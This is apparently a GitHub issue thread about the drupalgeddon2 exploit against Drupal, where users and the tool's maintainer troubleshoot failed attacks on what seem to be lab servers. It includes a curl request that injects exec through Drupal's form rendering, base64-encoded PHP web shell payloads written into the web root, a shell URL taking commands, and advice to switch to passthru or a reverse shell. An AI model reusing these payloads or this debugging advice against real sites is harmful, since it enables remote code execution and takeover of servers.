Exploit FAILED ~ Response: 404 about drupalgeddon2 HOT 17 CLOSED

Hello,

Please check drupal logs.

The first request of the exploit returns the expected response, so I guess base64 binary is missing from your RHEL7 installation.

In the log you might see something like:

1.sh: base64 command not found

from drupalgeddon2.

Thanks for the reply

ruby new.rb http://192.168.0.208
[*] --==[::#Drupalggedon2::]==--

[+] Target seems to be exploitable! w00hooOO!
[+] PHP shell: http://192.168.0.208/s.php?c=CMD
[+] Type your commands (exit to exit) and press Enter!
Drupalgeddon2-> id
`

<title>Page not found | Drupal Site</title>
<link rel="stylesheet" href="/sites/default/files/css/css_2ud1l8AYT-mA2srFCxTDcpG9V5EgtOQkSNUVPaX_2iQ.css?0" media="all" />

[root@drupal2 log]# whereis base64
base64: /usr/bin/base64 /usr/share/man/man1/base64.1.gz

Base64 exists on target.

Log says
192.168.0.200 - - [15/Apr/2018:12:28:55 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 156 "-" "Ruby"
192.168.0.200 - - [15/Apr/2018:12:29:00 +0000] "GET /s.php?c=id HTTP/1.1" 404 8089 "-" "Ruby"

from drupalgeddon2.

Maybe some write permissions issue? Remember that you can just execute command without needing to write a shell to disk. Change exec -> passthru, you should receive command output on data field. Another solution, just specify a reverse shell command to the payload and receive a reverse shell without writing into disk.

from drupalgeddon2.

It is possible to work with chmod command ?

from drupalgeddon2.

It's just not working

curl --data 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()' 'http://192.168.0.208/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'

[{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C/span\u003E","settings":null}]r

BTW I followed this guide to setup the Application (selinux and firewalld off) on ESXi 6.5.
https://www.tecmint.com/install-drupal-in-centos-rhel-fedora/

from drupalgeddon2.

Once #13 is merged in, please could you retest?

Edit: Merged. Can you try now?

from drupalgeddon2.

@g0tmi1k I'm having the same issue myself. The call to /?q=user/password succeeds for obtaining the form_build_id but then the next call to /file/ajax... fails with a 404 error. Does /file/ajax maybe require some Drupal option or module installed for it to be accessible?

from drupalgeddon2.

Its working for me out of the box for v7.55 and v7.57.
I've just done a fresh install, and nothing more.

I've heard/seen stuff on twitter its common for things to be disabled/altered for v7.

from drupalgeddon2.

@stinkefisch #14 likely has a fix for your issue

from drupalgeddon2.

I believe the root cause was an issue with Clean URLs not being enabled in Drupal. Details here: https://www.drupal.org/node/15365

from drupalgeddon2.

I am getting this error when I tested it for D8. But I can see the php file s.php is already there inside my Drupal dir. Also I did it to chmod 777 s.php but same error page not found.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (Ubuntu)</center>
</body>
</html>

from drupalgeddon2.

Thanks for the reply.

[*] --==[::#Drupalggedon2::]==--

[*] Target : http://192.168.0.209/

[!] MISSING: http://192.168.0.209/CHANGELOG.txt (404)
[+] Found : http://192.168.0.209/core/CHANGELOG.txt (200)
[+] Drupal!: 8.4.5

[] Testing: Code Execution
[] Payload: echo MJOEPXUN
[+] Result :
[+] Target might to be exploitable?

[] Testing: File Write To Web Root (./)
[] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./s.php
[+] Result :
[!] Target is NOT exploitable. No write access here!
[] Testing: File Write To Web Root (./sites/default/)
[] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./sites/default/s.php
[+] Result :
[!] Target is NOT exploitable. No write access here!
[] Testing: File Write To Web Root (./sites/default/files/)
[] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./sites/default/files/s.php
[+] Result :
[!] Target is NOT exploitable. No write access here!

[!] FAILED: Coudn't find writeable web path
[*] Dropping back direct commands (expect an ugly shell!)

That's a bit wired, cause as a test I did a chmod -R 777 on /var/www/html and still get this issue.
Odd

SELinux status: disabled

from drupalgeddon2.

@stinkefisch
Does the target have base64 installed?
If so, whats the output of base64 -h) ?
If there package is missing, that would explain it.
If the package is there, I wonder if the flag is -D for you and not -d as it is currently

@dbjpanda New issue, new post.
Please don't hijack someone elses.

@adampankow
Thanks for the heads up, will test

from drupalgeddon2.

@g0tmi1k
It is the app exploit works well in the wild.
I'll have another play with my app.
Thanks for the support.

from drupalgeddon2.

@stinkefisch
I'm sorry, I don't understand what you are saying.
Could you re-word your last statement?

from drupalgeddon2.

I meant it is the drupal app itself locally.
I'll check another drupal install doc and retest it.
Thanks

from drupalgeddon2.

Feel free to re-open when you have re-tested (and there is still an issue!)

from drupalgeddon2.